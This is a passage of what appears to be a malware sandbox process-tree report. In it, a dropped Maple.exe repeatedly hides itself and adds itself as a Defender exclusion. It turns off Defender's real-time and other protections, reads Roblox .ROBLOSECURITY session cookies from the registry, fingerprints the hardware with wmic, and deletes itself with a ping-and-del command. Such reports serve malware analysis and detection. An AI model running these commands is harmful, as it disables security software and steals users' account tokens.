        Detects videocard installed
        
        PID:4272
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3260
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:980
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        15⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4032
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        15⤵
        Executes dropped EXE
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5480
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        16⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        16⤵
        Executes dropped EXE
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3080
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        17⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        17⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:5804
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:4604
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        18⤵
        Views/modifies file attributes
        
        PID:5140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        
        PID:2752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        
        PID:5000
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        18⤵
        
        PID:1620
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        18⤵
        
        PID:4440
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2628
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        18⤵
        Detects videocard installed
        
        PID:440
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4728
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3212
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        18⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2440
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        18⤵
        Executes dropped EXE
        
        PID:5504
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4500
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        19⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        19⤵
        Executes dropped EXE
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:948
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        20⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        20⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:5484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:636
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        21⤵
        Views/modifies file attributes
        
        PID:5716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        21⤵
        
        PID:3312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        
        PID:2556
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        21⤵
        
        PID:2456
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        21⤵
        
        PID:5972
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:5844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        21⤵
        
        PID:4564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        21⤵
        Detects videocard installed
        
        PID:3532
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2348
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        21⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        21⤵
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        21⤵
        Checks computer location settings
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        22⤵
        System Location Discovery: System Language Discovery
        
        PID:3824
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        22⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        22⤵
        Checks computer location settings
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        23⤵
        System Location Discovery: System Language Discovery
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        23⤵
        Drops file in Drivers directory
        
        PID:5800
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:4576
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        24⤵
        Views/modifies file attributes
        
        PID:4700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        
        PID:1300
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        24⤵
        
        PID:1204
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        24⤵
        
        PID:4556
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:4324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3048
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        24⤵
        Detects videocard installed
        
        PID:5168
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1176
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        25⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        23⤵
        Checks computer location settings
        
        PID:5948
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        24⤵
        System Location Discovery: System Language Discovery
        
        PID:3784
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        24⤵
        
        PID:544
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        24⤵
        Checks computer location settings
        
        PID:888
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        25⤵
        System Location Discovery: System Language Discovery
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        25⤵
        Drops file in Drivers directory
        
        PID:2472
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:3684
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        26⤵
        Views/modifies file attributes
        
        PID:1324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        
        PID:3576
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        26⤵
        
        PID:4328
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        26⤵
        
        PID:3956
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:1480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        26⤵
        Detects videocard installed
        
        PID:2344
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:544
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        25⤵
        Checks computer location settings
        
        PID:4660
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        26⤵
        System Location Discovery: System Language Discovery
        
        PID:6120
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        26⤵
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        26⤵
        Checks computer location settings
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        27⤵
        System Location Discovery: System Language Discovery
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        27⤵
        
        PID:1560
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        27⤵
        Checks computer location settings
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        28⤵
        System Location Discovery: System Language Discovery
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        28⤵
        Drops file in Drivers directory
        
        PID:3460
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:3136
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        29⤵
        Views/modifies file attributes
        
        PID:1436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        29⤵
        
        PID:2900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        
        PID:3156
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        29⤵
        
        PID:4540
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        29⤵
        
        PID:5548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:1052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3104
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        29⤵
        Detects videocard installed
        
        PID:64
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3276
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        28⤵
        Checks computer location settings
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        29⤵
        System Location Discovery: System Language Discovery
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        29⤵
        
        PID:1752
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        29⤵
        Checks computer location settings
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        30⤵
        System Location Discovery: System Language Discovery
        
        PID:5380
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        30⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        30⤵
        Checks computer location settings
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        31⤵
        System Location Discovery: System Language Discovery
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        31⤵
        Drops file in Drivers directory
        
        PID:4984
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:4472
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        32⤵
        Views/modifies file attributes
        
        PID:1064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:4732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:5744
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        32⤵
        
        PID:2560
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        32⤵
        
        PID:272
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:1264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5228
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        32⤵
        Detects videocard installed
        
        PID:2828
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5820
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5360
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        31⤵
        Checks computer location settings
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        32⤵
        System Location Discovery: System Language Discovery
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        32⤵
        
        PID:3336
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        32⤵
        Checks computer location settings
        
        PID:3880
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        33⤵
        System Location Discovery: System Language Discovery
        
        PID:4608
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        33⤵
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        33⤵
        Checks computer location settings
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        34⤵
        System Location Discovery: System Language Discovery
        
        PID:5784
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        34⤵
        Drops file in Drivers directory
        
        PID:4180
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        35⤵
        
        PID:4004
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        35⤵
        Views/modifies file attributes
        
        PID:392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        35⤵
        
        PID:1404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        
        PID:3236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        
        PID:2860
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        35⤵
        
        PID:5348
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        35⤵
        
        PID:4856
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        35⤵
        
        PID:4292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
